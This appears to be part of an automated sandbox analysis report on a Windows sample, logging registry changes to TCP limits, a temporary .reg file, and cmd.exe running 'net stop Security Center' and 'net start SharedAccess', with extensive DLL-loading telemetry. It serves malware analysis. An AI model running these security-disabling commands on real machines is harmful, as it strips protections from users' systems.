Key value set	Path: HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\International Name: W2KLpk Type: Dword Data: 0	success or wait	1616665131
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxFreeTcbs Type: Dword Data: 2000	success or wait	1616951936
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxHashTableSize Type: Dword Data: 2048	success or wait	1616960510
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: TcpTimedWaitDelay Type: Dword Data: 30	success or wait	1616993867
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1616996189
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxUserPort Type: Dword Data: 63000	success or wait	1617084995
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1617088268
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1617143786
Process terminated	PID: 1500 Path: C:\WINDOWS\regedit.exe	success or wait	1617206315

Analysis File: cmd.exe PID: 1692 Parent PID: 740

Sections

General
Start time:	07:41:17
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net stop Security Center
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	EnableExtensions	success or wait	2	4AD04A4F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	DelayedExpansion	object name not found	2	4AD04A88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	DefaultColor	success or wait	2	4AD04AAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	PathCompletionChar	success or wait	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	AutoRun	success or wait	1	4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	PathCompletionChar	object name not found	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1984	C:\WINDOWS\system32\net.exe	net stop Security Center	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1692	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1611398438
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1611479237
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1611483979
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1611492704
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1611497677
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1611540798
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1611561619
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1611565317
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1611664565
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1611677663
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1611725269
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1611733462
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1611754994
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1611766815
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1611779580
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1611944769
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1612046781
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1612259497
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1612840506
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1613187343
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1613289105
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1613311060
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1613373761
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1613446674
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1613497466
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1613553880
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1613641085
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1613665723
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1613678009
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1615079577
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1615190806
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1615199675
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1615296072
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1615301350
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1615307055
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1615646781
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1615759882
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DisableUNCCheck	object name not found	1615943134
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: EnableExtensions	success or wait	1615944000
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DelayedExpansion	object name not found	1615947001
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DefaultColor	success or wait	1615949052
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: CompletionChar	success or wait	1615950068
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: PathCompletionChar	success or wait	1615951400
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: AutoRun	success or wait	1615956358
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DisableUNCCheck	object name not found	1615958421
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: EnableExtensions	success or wait	1615974679
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DelayedExpansion	object name not found	1615976514
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: DefaultColor	success or wait	1615977414
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: CompletionChar	success or wait	1615978515
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: PathCompletionChar	object name not found	1615981999
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm Name: AutoRun	object name not found	1615982841
Memory allocated	PID: 1692 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1615988488
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1617211149
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1617326825
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1617337960
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1617409214
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1617532223
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1617594713
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1617638999
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1617682883
Process created	PID: 1984 Path: C:\WINDOWS\system32\net.exe Cmdline: net stop Security Center Createflags: suspended	success or wait	1617760566

Analysis File: cmd.exe PID: 444 Parent PID: 740

Sections

General
Start time:	07:41:18
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net start SharedAccess
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\.DEFAULT\Control Panel\International	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\.DEFAULT\Control Panel\International	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\.DEFAULT\Control Panel\International	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\.DEFAULT\Control Panel\International	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\.DEFAULT\Control Panel\International	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\.DEFAULT\Control Panel\International	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\.DEFAULT\Control Panel\International	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\.DEFAULT\Control Panel\International	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\.DEFAULT\Control Panel\International	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\.DEFAULT\Control Panel\International	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1928	C:\WINDOWS\system32\net.exe	net start SharedAccess	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
444	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1612001265
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1612044077
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1612060601
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1612064725
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1612070917
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1612277297
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1612706434
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1612721849
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1613163633
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1613231524
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1613303467
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1613312800
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1613332500
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1613366789
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1613388768
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1613420535
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1613469036
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1613514049
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1613588869
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1613681375
